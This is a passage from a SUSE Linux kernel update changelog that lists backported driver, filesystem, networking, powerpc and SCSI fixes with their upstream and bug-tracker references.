(git-fixes).\n - USB: serial: option: fix Quectel BG96 matching (git-fixes).\n - USB: xhci: fix U1/U2 handling for hardware with XHCI_INTEL_HOST quirk\n set (git-fixes).\n - USB: yurex: fix control-URB timeout handling (git-fixes).\n - ata/libata: Fix usage of page address by page_address in\n ata_scsi_mode_select_xlat function (git-fixes).\n - ath10k: Fix an error handling path (git-fixes).\n - ath10k: Release some resources in an error handling path (git-fixes).\n - ath10k: Remove msdu from idr when management pkt send fails (git-fixes).\n - ath10k: fix backtrace on coredump (git-fixes).\n - ath10k: fix get invalid tx rate for Mesh metric (git-fixes).\n - ath10k: fix offchannel tx failure when no ath10k_mac_tx_frm_has_freq\n (git-fixes).\n - ath6kl: fix enum-conversion warning (git-fixes).\n - ath9k_htc: Discard undersized packets (git-fixes).\n - ath9k_htc: Modify byte order for an error message (git-fixes).\n - ath9k_htc: Silence undersized packet warnings (git-fixes).\n - ath9k_htc: Use appropriate rs_datalen type (git-fixes).\n - backlight: lp855x: Ensure regulators are disabled on probe failure\n (git-fixes).\n - btmrvl: Fix firmware filename for sd8997 chipset (bsc#1172694).\n - btrfs: fix use-after-free on readahead extent after failure to create it\n (bsc#1179963).\n - btrfs: qgroup: do not commit transaction when we already hold the handle\n (bsc#1178634).\n - btrfs: qgroup: do not try to wait flushing if we're already holding a\n transaction (bsc#1179575).\n - btrfs: remove a BUG_ON() from merge_reloc_roots() (bsc#1174784).\n - bus: fsl-mc: fix error return code in fsl_mc_object_allocate()\n (git-fixes).\n - can: mcp251x: add error check when wq alloc failed (git-fixes).\n - can: softing: softing_netdev_open(): fix error handling (git-fixes).\n - cfg80211: initialize rekey_data (git-fixes).\n - cfg80211: regulatory: Fix inconsistent format argument (git-fixes).\n - cifs: add NULL check for ses->tcon_ipc (bsc#1178270).\n - cifs: allow syscalls to be restarted in __smb_send_rqst() (bsc#1176956).\n - cifs: fix check of tcon dfs in smb1 (bsc#1178270).\n - cifs: fix potential use-after-free in cifs_echo_request() (bsc#1139944).\n - cirrus: cs89x0: remove set but not used variable 'lp' (git-fixes).\n - cirrus: cs89x0: use devm_platform_ioremap_resource() to simplify code\n (git-fixes).\n - clk: at91: usb: continue if clk_hw_round_rate() return zero (git-fixes).\n - clk: mvebu: a3700: fix the XTAL MODE pin to MPP1_9 (git-fixes).\n - clk: qcom: Allow constant ratio freq tables for rcg (git-fixes).\n - clk: qcom: msm8916: Fix the address location of pll->config_reg\n (git-fixes).\n - clk: s2mps11: Fix a resource leak in error handling paths in the probe\n function (git-fixes).\n - clk: samsung: exynos5433: Add IGNORE_UNUSED flag to sclk_i2s1\n (git-fixes).\n - clk: sunxi-ng: Make sure divider tables have sentinel (git-fixes).\n - clk: tegra: Fix Tegra PMC clock out parents (git-fixes).\n - clk: tegra: Fix duplicated SE clock entry (git-fixes).\n - clk: ti: Fix memleak in ti_fapll_synth_setup (git-fixes).\n - clk: ti: composite: fix memory leak (git-fixes).\n - clk: ti: dra7-atl-clock: Remove ti_clk_add_alias call (git-fixes).\n - clocksource/drivers/asm9260: Add a check for of_clk_get (git-fixes).\n - coredump: fix core_pattern parse error (git-fixes).\n - cpufreq: highbank: Add missing MODULE_DEVICE_TABLE (git-fixes).\n - cpufreq: loongson1: Add missing MODULE_ALIAS (git-fixes).\n - cpufreq: scpi: Add missing MODULE_ALIAS (git-fixes).\n - cpufreq: st: Add missing MODULE_DEVICE_TABLE (git-fixes).\n - crypto: af_alg - avoid undefined behavior accessing salg_name\n (git-fixes).\n - crypto: omap-aes - Fix PM disable depth imbalance in omap_aes_probe\n (git-fixes).\n - crypto: qat - fix status check in qat_hal_put_rel_rd_xfer() (git-fixes).\n - crypto: talitos - Fix return type of current_desc_hdr() (git-fixes).\n - cw1200: fix missing destroy_workqueue() on error in cw1200_init_common\n (git-fixes).\n - dmaengine: xilinx_dma: check dma_async_device_register return value\n (git-fixes).\n - dmaengine: xilinx_dma: fix mixed_enum_type coverity warning (git-fixes).\n - docs: Fix reST markup when linking to sections (git-fixes).\n - drivers: base: Fix NULL pointer exception in __platform_driver_probe()\n if a driver developer is foolish (git-fixes).\n - drivers: soc: ti: knav_qmss_queue: Fix error return code in\n knav_queue_probe (git-fixes).\n - drm/amd/display: remove useless if/else (git-fixes).\n - drm/amdgpu: fix build_coefficients() argument (git-fixes).\n - drm/dp_aux_dev: check aux_dev before use in\n drm_dp_aux_dev_get_by_minor() (git-fixes).\n - drm/gma500: Fix out-of-bounds access to struct drm_device.vblank[]\n (bsc#1129770)\n - drm/gma500: fix double free of gma_connector (git-fixes).\n - drm/meson: dw-hdmi: Register a callback to disable the regulator\n (git-fixes).\n - drm/msm/dpu: Add newline to printks (git-fixes).\n - drm/msm/dsi_phy_10nm: implement PHY disabling (git-fixes).\n - drm/omap: dmm_tiler: fix return error code in omap_dmm_probe()\n (git-fixes).\n - drm/rockchip: Avoid uninitialized use of endpoint id in LVDS (git-fixes).\n - epoll: Keep a reference on files added to the check list (bsc#1180031).\n - ethernet: ucc_geth: fix use-after-free in ucc_geth_remove() (git-fixes).\n - ext4: correctly report \"not supported\" for {usr,grp}jquota when\n !CONFIG_QUOTA (bsc#1179672).\n - ext4: fix bogus warning in ext4_update_dx_flag() (bsc#1179716).\n - ext4: fix error handling code in add_new_gdb (bsc#1179722).\n - ext4: fix invalid inode checksum (bsc#1179723).\n - ext4: fix leaking sysfs kobject after failed mount (bsc#1179670).\n - ext4: limit entries returned when counting fsmap records (bsc#1179671).\n - ext4: unlock xattr_sem properly in ext4_inline_data_truncate()\n (bsc#1179673).\n - extcon: max77693: Fix modalias string (git-fixes).\n - fbcon: Fix user font detection test at fbcon_resize(). (bsc#1112178)\n - fbcon: Remove the superfluous break (bsc#1129770)\n - firmware: qcom: scm: Ensure 'a0' status code is treated as signed\n (git-fixes).\n - fix regression in \"epoll: Keep a reference on files added to the check\n list\" (bsc#1180031, git-fixes).\n - forcedeth: use per cpu to collect xmit/recv statistics (git-fixes).\n - fs: Do not invalidate page buffers in block_write_full_page()\n (bsc#1179711).\n - geneve: change from tx_error to tx_dropped on missing metadata\n (git-fixes).\n - genirq/irqdomain: Add an irq_create_mapping_affinity() function\n (bsc#1065729).\n - gpio: arizona: handle pm_runtime_get_sync failure case (git-fixes).\n - gpio: gpio-grgpio: fix possible sleep-in-atomic-context bugs in\n grgpio_irq_map/unmap() (git-fixes).\n - gpio: max77620: Add missing dependency on GPIOLIB_IRQCHIP (git-fixes).\n - gpio: max77620: Fixup debounce delays (git-fixes).\n - gpio: max77620: Use correct unit for debounce times (git-fixes).\n - gpio: mpc8xxx: Add platform device to gpiochip->parent (git-fixes).\n - gpio: mvebu: fix potential user-after-free on probe (git-fixes).\n - gpiolib: acpi: Add honor_wakeup module-option + quirk mechanism\n (git-fixes).\n - gpiolib: acpi: Add quirk to ignore EC wakeups on HP x2 10 BYT + AXP288\n model (git-fixes).\n - gpiolib: acpi: Add quirk to ignore EC wakeups on HP x2 10 CHT + AXP288\n model (git-fixes).\n - gpiolib: acpi: Correct comment for HP x2 10 honor_wakeup quirk\n (git-fixes).\n - gpiolib: acpi: Rework honor_wakeup option into an ignore_wake option\n (git-fixes).\n - gpiolib: acpi: Turn dmi_system_id table into a generic quirk table\n (git-fixes).\n - gpiolib: fix up emulated open drain outputs (git-fixes).\n - hwmon: (aspeed-pwm-tacho) Avoid possible buffer overflow (git-fixes).\n - hwmon: (jc42) Fix name to have no illegal characters (git-fixes).\n - i2c: algo: pca: Reapply i2c bus settings after reset (git-fixes).\n - i2c: i801: Fix resume bug (git-fixes).\n - i2c: piix4: Detect secondary SMBus controller on AMD AM4 chipsets\n (git-fixes).\n - i2c: pxa: clear all master action bits in i2c_pxa_stop_message()\n (git-fixes).\n - i2c: pxa: fix i2c_pxa_scream_blue_murder() debug output (git-fixes).\n - i2c: qup: Fix error return code in qup_i2c_bam_schedule_desc()\n (git-fixes).\n - ibmvnic: add some debugs (bsc#1179896 ltc#190255).\n - ibmvnic: avoid memset null scrq msgs (bsc#1044767 ltc#155231 git-fixes).\n - ibmvnic: continue fatal error reset after passive init (bsc#1171078\n ltc#184239 git-fixes).\n - ibmvnic: delay next reset if hard reset fails (bsc#1094840 ltc#167098\n git-fixes).\n - ibmvnic: enhance resetting status check during module exit (bsc#1065729).\n - ibmvnic: fix NULL pointer dereference in reset_sub_crq_queues\n (bsc#1040855 ltc#155067 git-fixes).\n - ibmvnic: fix call_netdevice_notifiers in do_reset (bsc#1115431\n ltc#171853 git-fixes).\n - ibmvnic: fix: NULL pointer dereference (bsc#1044767 ltc#155231\n git-fixes).\n - ibmvnic: notify peers when failover and migration happen (bsc#1044120\n ltc#155423 git-fixes).\n - ibmvnic: restore adapter state on failed reset (bsc#1152457 ltc#174432\n git-fixes).\n - iio: adc: max1027: Reset the device at probe time (git-fixes).\n - iio: adc: rockchip_saradc: fix missing clk_disable_unprepare() on error\n in rockchip_saradc_resume (git-fixes).\n - iio: bmp280: fix compensation of humidity (git-fixes).\n - iio: buffer: Fix demux update (git-fixes).\n - iio: dac: ad5592r: fix unbalanced mutex unlocks in ad5592r_read_raw()\n (git-fixes).\n - iio: fix center temperature of bmc150-accel-core (git-fixes).\n - iio: humidity: hdc100x: fix IIO_HUMIDITYRELATIVE channel reporting\n (git-fixes).\n - iio: light: bh1750: Resolve compiler warning and make code more readable\n (git-fixes).\n - iio: srf04: fix wrong limitation in distance measuring (git-fixes).\n - iio:imu:bmi160: Fix too large a buffer (git-fixes).\n - iio:pressure:mpl3115: Force alignment of buffer (git-fixes).\n - inet_ecn: Fix endianness of checksum update when setting ECT(1)\n (git-fixes).\n - ipw2x00: Fix -Wcast-function-type (git-fixes).\n - irqchip/alpine-msi: Fix freeing of interrupts on allocation error path\n (git-fixes).\n - iwlwifi: mvm: fix kernel panic in case of assert during CSA (git-fixes).\n - iwlwifi: mvm: fix unaligned read of rx_pkt_status (git-fixes).\n - iwlwifi: pcie: limit memory read spin time (git-fixes).\n - kABI fix for g2d (git-fixes).\n - kABI workaround for HD-audio generic parser (git-fixes).\n - kABI workaround for dsa/b53 changes (git-fixes).\n - kABI workaround for net/ipvlan changes (git-fixes).\n - kABI: ath10k: move a new structure member to the end (git-fixes).\n - kABI: genirq: add back irq_create_mapping (bsc#1065729).\n - kernel-source.spec: Fix build with rpm 4.16 (boo#1179015).\n - kernel-{binary,source}.spec.in: do not create loop symlinks (bsc#1179082)\n - kgdb: Fix spurious true from in_dbg_master() (git-fixes).\n - mac80211: Check port authorization in the ieee80211_tx_dequeue() case\n (git-fixes).\n - mac80211: allow rx of mesh eapol frames with default rx key (git-fixes).\n - mac80211: do not set set TDLS STA bandwidth wider than possible\n (git-fixes).\n - mac80211: fix authentication with iwlwifi/mvm (git-fixes).\n - mac80211: fix use of skb payload instead of header (git-fixes).\n - mac80211: mesh: fix mesh_pathtbl_init() error path (git-fixes).\n - matroxfb: avoid -Warray-bounds warning (git-fixes).\n - md-cluster: fix rmmod issue when md_cluster convert bitmap to none\n (bsc#1163727).\n - md-cluster: fix safemode_delay value when converting to clustered bitmap\n (bsc#1163727).\n - md-cluster: fix wild pointer of unlock_all_bitmaps() (bsc#1163727).\n - md/bitmap: fix memory leak of temporary bitmap (bsc#1163727).\n - md/bitmap: md_bitmap_get_counter returns wrong blocks (bsc#1163727).\n - md/bitmap: md_bitmap_read_sb uses wrong bitmap blocks (bsc#1163727).\n - md/cluster: block reshape with remote resync job (bsc#1163727).\n - md/cluster: fix deadlock when node is doing resync job (bsc#1163727).\n - md/raid5: fix oops during stripe resizing (git-fixes).\n - media: am437x-vpfe: Setting STD to current value is not an error\n (git-fixes).\n - media: cec-funcs.h: add status_req checks (git-fixes).\n - media: cx88: Fix some error handling path in 'cx8800_initdev()'\n (git-fixes).\n - media: gp8psk: initialize stats at power control logic (git-fixes).\n - media: gspca: Fix memory leak in probe (git-fixes).\n - media: i2c: mt9v032: fix enum mbus codes and frame sizes (git-fixes).\n - media: i2c: ov2659: Fix missing 720p register config (git-fixes).\n - media: i2c: ov2659: fix s_stream return value (git-fixes).\n - media: msi2500: assign SPI bus number dynamically (git-fixes).\n - media: mtk-mdp: Fix a refcounting bug on error in init (git-fixes).\n - media: mtk-vcodec: add missing put_device() call in\n mtk_vcodec_release_dec_pm() (git-fixes).\n - media: platform: add missing put_device() call in mtk_jpeg_probe() and\n mtk_jpeg_remove() (git-patches).\n - media: pvrusb2: Fix oops on tear-down when radio support is not present\n (git-fixes).\n - media: s5p-g2d: Fix a memory leak in an error handling path in\n 'g2d_probe()' (git-fixes).\n - media: saa7146: fix array overflow in vidioc_s_audio() (git-fixes).\n - media: si470x-i2c: add missed operations in remove (git-fixes).\n - media: siano: fix memory leak of debugfs members in smsdvb_hotplug\n (git-fixes).\n - media: solo6x10: fix missing snd_card_free in error handling case\n (git-fixes).\n - media: sti: bdisp: fix a possible sleep-in-atomic-context bug in\n bdisp_device_run() (git-fixes).\n - media: sunxi-cir: ensure IR is handled when it is continuous (git-fixes).\n - media: ti-vpe: vpe: Make sure YUYV is set as default format (git-fixes).\n - media: ti-vpe: vpe: ensure buffers are cleaned up properly in abort\n cases (git-fixes).\n - media: ti-vpe: vpe: fix a v4l2-compliance failure about frame sequence\n number (git-fixes).\n - media: ti-vpe: vpe: fix a v4l2-compliance failure about invalid\n sizeimage (git-fixes).\n - media: ti-vpe: vpe: fix a v4l2-compliance failure causing a kernel panic\n (git-fixes).\n - media: ti-vpe: vpe: fix a v4l2-compliance warning about invalid pixel\n format (git-fixes).\n - media: uvcvideo: Set media controller entity functions (git-fixes).\n - media: uvcvideo: Silence shift-out-of-bounds warning (git-fixes).\n - media: v4l2-async: Fix trivial documentation typo (git-fixes).\n - media: v4l2-core: fix touch support in v4l_g_fmt (git-fixes).\n - media: v4l2-device.h: Explicitly compare grp{id,mask} to zero in\n v4l2_device macros (git-fixes).\n - mei: bus: do not clean driver pointer (git-fixes).\n - mei: protect mei_cl_mtu from null dereference (git-fixes).\n - memstick: fix a double-free bug in memstick_check (git-fixes).\n - memstick: r592: Fix error return in r592_probe() (git-fixes).\n - mfd: rt5033: Fix errorneous defines (git-fixes).\n - mfd: wm8994: Fix driver operation if loaded as modules (git-fixes).\n - misc: vmw_vmci: fix kernel info-leak by initializing dbells in\n vmci_ctx_get_chkpt_doorbells() (git-fixes).\n - mm,memory_failure: always pin the page in madvise_inject_error\n (bsc#1180258).\n - mm/userfaultfd: do not access vma->vm_mm after calling\n handle_userfault() (bsc#1179204).\n - mm: do not wake kswapd prematurely when watermark boosting is disabled\n (git fixes (mm/vmscan)).\n - mwifiex: fix mwifiex_shutdown_sw() causing sw reset failure (git-fixes).\n - net/smc: fix valid DMBE buffer sizes (git-fixes).\n - net/x25: prevent a couple of overflows (bsc#1178590).\n - net: aquantia: Fix aq_vec_isr_legacy() return value (git-fixes).\n - net: aquantia: fix LRO with FCS error (git-fixes).\n - net: bcmgenet: reapply manual settings to the PHY (git-fixes).\n - net: broadcom/bcmsysport: Fix signedness in bcm_sysport_probe()\n (git-fixes).\n - net: dsa: b53: Always use dev->vlan_enabled in b53_configure_vlan()\n (git-fixes).\n - net: dsa: b53: Ensure the default VID is untagged (git-fixes).\n - net: dsa: b53: Fix default VLAN ID (git-fixes).\n - net: dsa: b53: Properly account for VLAN filtering (git-fixes).\n - net: dsa: bcm_sf2: Do not assume DSA master supports WoL (git-fixes).\n - net: dsa: bcm_sf2: potential array overflow in bcm_sf2_sw_suspend()\n (git-fixes).\n - net: dsa: qca8k: remove leftover phy accessors (git-fixes).\n - net: ethernet: stmmac: Fix signedness bug in ipq806x_gmac_of_parse()\n (git-fixes).\n - net: ethernet: ti: cpsw: clear all entries when delete vid (git-fixes).\n - net: ethernet: ti: cpsw: fix runtime_pm while add/kill vlan (git-fixes).\n - net: hisilicon: Fix signedness bug in hix5hd2_dev_probe() (git-fixes).\n - net: macb: add missing barriers when reading descriptors (git-fixes).\n - net: macb: fix dropped RX frames due to a race (git-fixes).\n - net: macb: fix error format in dev_err() (git-fixes).\n - net: macb: fix random memory corruption on RX with 64-bit DMA\n (git-fixes). - blacklist.conf:\n - net: pasemi: fix an use-after-free in pasemi_mac_phy_init() (git-fixes).\n - net: phy: Avoid multiple suspends (git-fixes).\n - net: phy: micrel: Discern KSZ8051 and KSZ8795 PHYs (git-fixes).\n - net: phy: micrel: make sure the factory test bit is cleared (git-fixes).\n - net: qca_spi: Move reset_count to struct qcaspi (git-fixes).\n - net: seeq: Fix the function used to release some memory in an error\n handling path (git-fixes).\n - net: sh_eth: fix a missing check of of_get_phy_mode (git-fixes).\n - net: sonic: replace dev_kfree_skb in sonic_send_packet (git-fixes).\n - net: sonic: return NETDEV_TX_OK if failed to map buffer (git-fixes).\n - net: stmmac: Fix reception of Broadcom switches tags (git-fixes).\n - net: stmmac: dwmac-meson8b: Fix signedness bug in probe (git-fixes).\n - net: stmmac: fix csr_clk can't be zero issue (git-fixes).\n - net: stmmac: fix length of PTP clock's name string (git-fixes).\n - net: stmmac: gmac4+: Not all Unicast addresses may be available\n (git-fixes).\n - net: usb: sr9800: fix uninitialized local variable (git-fixes).\n - net:ethernet:aquantia: Extra spinlocks removed (git-fixes).\n - nfc: s3fwrn5: Release the nfc firmware (git-fixes).\n - nfc: s3fwrn5: add missing release on skb in s3fwrn5_recv_frame\n (git-fixes).\n - ocfs2: fix unbalanced locking (bsc#1180506).\n - ocfs2: initialize ip_next_orphan (bsc#1179724).\n - orinoco: Move context allocation after processing the skb (git-fixes).\n - pNFS/flexfiles: Fix list corruption if the mirror count changes\n (git-fixes).\n - parport: load lowlevel driver if ports not found (git-fixes).\n - phy: Revert toggling reset changes (git-fixes).\n - pinctrl: amd: fix __iomem annotation in amd_gpio_irq_handler()\n (git-fixes).\n - pinctrl: amd: fix npins for uart0 in kerncz_groups (git-fixes).\n - pinctrl: amd: remove debounce filter setting in IRQ type setting\n (git-fixes).\n - pinctrl: baytrail: Avoid clearing debounce value when turning it off\n (git-fixes).\n - pinctrl: falcon: add missing put_device() call in pinctrl_falcon_probe()\n (git-fixes).\n - pinctrl: merrifield: Set default bias in case no particular value given\n (git-fixes).\n - pinctrl: sh-pfc: sh7734: Fix duplicate TCLK1_B (git-fixes).\n - platform/x86: acer-wmi: add automatic keyboard background light toggle\n key as KEY_LIGHTS_TOGGLE (git-fixes).\n - platform/x86: dell-smbios-base: Fix error return code in\n dell_smbios_init (git-fixes).\n - platform/x86: mlx-platform: Fix item counter assignment for MSN2700,\n MSN24xx systems (git-fixes).\n - platform/x86: mlx-platform: Remove PSU EEPROM from MSN274x platform\n configuration (git-fixes).\n - platform/x86: mlx-platform: Remove PSU EEPROM from default platform\n configuration (git-fixes).\n - platform/x86: mlx-platform: remove an unused variable (git-fixes).\n - power: supply: bq24190_charger: fix reference leak (git-fixes).\n - power: supply: bq27xxx_battery: Silence deferred-probe error (git-fixes).\n - powerpc/64: Set up a kernel stack for secondaries before cpu_restore()\n (bsc#1065729).\n - powerpc/64s/pseries: Fix hash tlbiel_all_isa300 for guest kernels\n (bsc#1179888 ltc#190253).\n - powerpc/64s: Fix hash ISA v3.0 TLBIEL instruction generation\n (bsc#1055117 ltc#159753 git-fixes bsc#1179888 ltc#190253).\n - powerpc/pci: Fix broken INTx configuration via OF (bsc#1172145\n ltc#184630).\n - powerpc/pci: Remove LSI mappings on device teardown (bsc#1172145\n ltc#184630).\n - powerpc/pci: Remove legacy debug code (bsc#1172145 ltc#184630 git-fixes).\n - powerpc/pci: Use of_irq_parse_and_map_pci() helper (bsc#1172145\n ltc#184630).\n - powerpc/perf: Add generic compat mode pmu driver (bsc#1178900\n ltc#189284).\n - powerpc/perf: Fix crash with is_sier_available when pmu is not set\n (bsc#1179578 ltc#189313).\n - powerpc/perf: Fix crashes with generic_compat_pmu & BHRB (bsc#1178900\n ltc#189284 git-fixes).\n - powerpc/perf: init pmu from core-book3s (bsc#1178900 ltc#189284).\n - powerpc/pseries/hibernation: remove redundant cacheinfo update\n (bsc#1138374 ltc#178199 git-fixes).\n - powerpc/pseries: Pass MSI affinity to irq_create_mapping() (bsc#1065729).\n - powerpc/smp: Add __init to init_big_cores() (bsc#1109695 ltc#171067\n git-fixes).\n - powerpc/xmon: Change printk() to pr_cont() (bsc#1065729).\n - powerpc: Convert to using %pOF instead of full_name (bsc#1172145\n ltc#184630).\n - powerpc: Fix incorrect stw{, ux, u, x} instructions in __set_pte_at\n (bsc#1065729).\n - ppp: remove the PPPIOCDETACH ioctl (git-fixes).\n - pwm: lp3943: Dynamically allocate PWM chip base (git-fixes).\n - quota: clear padding in v2r1_mem2diskdqb() (bsc#1179714).\n - radeon: insert 10ms sleep in dce5_crtc_load_lut (git-fixes).\n - ravb: Fix use-after-free ravb_tstamp_skb (git-fixes).\n - regmap: Remove duplicate `type` field from regmap `regcache_sync` trace\n event (git-fixes).\n - regmap: debugfs: check count when read regmap file (git-fixes).\n - regmap: dev_get_regmap_match(): fix string comparison (git-fixes).\n - regulator: max8907: Fix the usage of uninitialized variable in\n max8907_regulator_probe() (git-fixes).\n - regulator: pfuze100-regulator: Variable \"val\" in\n pfuze100_regulator_probe() could be uninitialized (git-fixes).\n - regulator: ti-abb: Fix timeout in\n ti_abb_wait_txdone/ti_abb_clear_all_txdone (git-fixes).\n - reiserfs: Fix oops during mount (bsc#1179715).\n - reiserfs: Initialize inode keys properly (bsc#1179713).\n - remoteproc: Fix wrong rvring index computation (git-fixes).\n - rfkill: Fix incorrect check to avoid NULL pointer dereference\n (git-fixes).\n - rpm/kernel-binary.spec.in: avoid using barewords (bsc#1179014)\n - rpm/kernel-binary.spec.in: avoid using more barewords (bsc#1179014)\n - rpm/kernel-binary.spec.in: use grep -E instead of egrep (bsc#1179045)\n - rpm/kernel-obs-build.spec.in: Add -q option to modprobe calls\n (bsc#1178401)\n - rpm/kernel-{source,binary}.spec: do not include ghost symlinks\n (boo#1179082).\n - rtc: 88pm860x: fix possible race condition (git-fixes).\n - rtc: hym8563: enable wakeup when applicable (git-fixes).\n - rtl8xxxu: fix RTL8723BU connection failure issue after warm reboot\n (git-fixes).\n - rtlwifi: fix memory leak in rtl92c_set_fw_rsvdpagepkt() (git-fixes).\n - s390/bpf: Fix multiple tail calls (git-fixes).\n - s390/cpuinfo: show processor physical address (git-fixes).\n - s390/cpum_sf.c: fix file permission for cpum_sfb_size (git-fixes).\n - s390/dasd: fix hanging device offline processing (bsc#1144912).\n - s390/dasd: fix null pointer dereference for ERP requests (git-fixes).\n - s390/pci: fix CPU address in MSI for directed IRQ (git-fixes).\n - s390/qeth: fix af_iucv notification race (git-fixes).\n - s390/qeth: fix tear down of async TX buffers (git-fixes).\n - s390/qeth: make af_iucv TX notification call more robust (git-fixes).\n - s390/stp: add locking to sysfs functions (git-fixes).\n - s390/zcrypt: Fix ZCRYPT_PERDEV_REQCNT ioctl (git-fixes).\n - scripts/lib/SUSE/MyBS.pm: properly close prjconf Macros: section\n - scsi: Remove unneeded break statements (bsc#1164780).\n - scsi: core: Fix VPD LUN ID designator priorities (bsc#1178049,\n git-fixes).\n - scsi: lpfc: Add FDMI Vendor MIB support (bsc#1164780).\n - scsi: lpfc: Convert SCSI I/O completions to SLI-3 and SLI-4 handlers\n (bsc#1164780).\n - scsi: lpfc: Convert SCSI path to use common I/O submission path\n (bsc#1164780).\n - scsi: lpfc: Convert abort handling to SLI-3 and SLI-4 handlers\n (bsc#1164780).\n - scsi: lpfc: Correct null ndlp reference on routine exit (bsc#1164780).\n - scsi: lpfc: Drop nodelist reference on error in lpfc_gen_req()\n (bsc#1164780).\n - scsi: lpfc: Enable common send_io interface for SCSI and NVMe\n (bsc#1164780).\n - scsi: lpfc: Enable common wqe_template support for both SCSI and NVMe\n (bsc#1164780).\n - scsi: lpfc: Enlarge max_sectors in scsi host templates (bsc#1164780).\n - scsi: lpfc: Extend the RDF FPIN Registration descriptor for additional\n events (bsc#1164780).\n - scsi: lpfc: Fix FLOGI/PLOGI receive race condition in pt2pt discovery\n (bsc#1164780).\n - scsi: lpfc: Fix NPIV Fabric Node reference counting (bsc#1164780).\n - scsi: lpfc: Fix NPIV discovery and Fabric Node detection (bsc#1164780).\n - scsi: lpfc: Fix duplicate wq_create_version check (bsc#1164780).\n - scsi: lpfc: Fix fall-through warnings for Clang (bsc#1164780).\n - scsi: lpfc: Fix invalid sleeping context in lpfc_sli4_nvmet_alloc()\n (bsc#1164780).\n - scsi: lpfc: Fix memory leak on lcb_context (bsc#1164780).\n - scsi: lpfc: Fix missing prototype for lpfc_nvmet_prep_abort_wqe()\n (bsc#1164780).\n - scsi: lpfc: Fix missing prototype warning for lpfc_fdmi_vendor_attr_mi()\n (bsc#1164780).\n - scsi: lpfc: Fix pointer defereference before it is null checked issue\n (bsc#1164780).\n - scsi: lpfc: Fix refcounting around SCSI and NVMe transport APIs\n (bsc#1164780).\n - scsi: lpfc: Fix removal of SCSI transport device get and put on dev\n structure (bsc#1164780).\n - scsi: lpfc: Fix scheduling call while in softirq context in\n lpfc_unreg_rpi (bsc#1164780).\n - scsi: lpfc: Fix set but not used warnings from Rework remote port lock\n handling (bsc#1164780).\n - scsi: lpfc: Fix set but unused variables in lpfc_dev_loss_tmo_handler()\n (bsc#1164780).\n - scsi: lpfc: Fix spelling mistake \"Cant\" -> \"Can't\" (bsc#1164780).\n - scsi: lpfc: Fix variable 'vport' set but not used in\n lpfc_sli4_abts_err_handler() (bsc#1164780).\n - scsi: lpfc: Refactor WQE structure definitions for common use\n (bsc#1164780).\n - scsi: lpfc: Reject CT request for MIB commands (bsc#1164780).\n - scsi: lpfc: Remove dead code on second !ndlp check (bsc#1164780).\n - scsi: lpfc: Remove ndlp when a PLOGI/ADISC/PRLI/REG_RPI ultimately fails\n (bsc#1164780).\n - scsi: lpfc: Remove set but not used 'qp' (bsc#1164780).\n - scsi: lpfc: Remove unneeded variable 'status' in\n lpfc_fcp_cpu_map_store() (bsc#1164780).\n - scsi: lpfc: Removed unused macros in lpfc_attr.c (bsc#1164780).\n - scsi: lpfc: Rework locations of ndlp reference taking (bsc#1164780).\n - scsi: lpfc: Rework remote port lock handling (bsc#1164780).\n - scsi: lpfc: Rework remote port ref counting and node freeing\n (bsc#1164780).\n - scsi: lpfc: Unsolicited ELS leaves node in incorrect state while\n dropping it (bsc#1164780).\n - scsi: lpfc: Update changed file copyrights for 2020 (bsc#1164780).\n - scsi: lpfc: Update lpfc version to 12.8.0.4 (bsc#1164780).\n - scsi: lpfc: Update lpfc version to 12.8.0.5 (bsc#1164780).\n - scsi: lpfc: Update lpfc version to 12.8.0.6 (bsc#1164780).\n - scsi: lpfc: Use generic power management (bsc#1164780).\n - scsi: lpfc: lpfc_attr: Demote kernel-doc format for redefined functions\n (bsc#1164780).\n - scsi: lpfc: lpfc_attr: Fix-up a bunch of kernel-doc misdemeanours\n (bsc#1164780).\n - scsi: lpfc: lpfc_debugfs: Fix a couple of function documentation issues\n (bsc#1164780).\n - scsi: lpfc: lpfc_scsi: Fix a whole host of kernel-doc issues\n (bsc#1164780).\n - scsi: qla2xxx: Change post del message from debug level to log level\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Convert to DEFINE_SHOW_ATTRIBUTE (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: qla2xxx: Do not check for fw_started while posting NVMe command\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Do not consume srb greedily (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: qla2xxx: Drop TARGET_SCF_LOOKUP_LUN_FROM_TAG (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix FW initialization error on big endian machines\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix N2N and NVMe connect retry failure (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix compilation issue in PPC systems (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix crash during driver load on big endian machines\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix device loss on 4G and older HBAs (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix flash update in 28XX adapters on big endian machines\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix return of uninitialized value in rval (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Fix the call trace for flush workqueue (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Handle aborts correctly for port undergoing deletion\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Handle incorrect entry_type entries (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: If fcport is undergoing deletion complete I/O with retry\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Initialize variable in qla8044_poll_reg() (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Limit interrupt vectors to number of CPUs (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Move sess cmd list/lock to driver (bsc#1172538\n bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Remove in_interrupt() from qla82xx-specific code\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Remove in_interrupt() from qla83xx-specific code\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Remove trailing semicolon in macro definition\n (bsc#1172538 bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Return EBUSY on fcport deletion (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: qla2xxx: Tear down session if FW say it is down (bsc#1172538\n 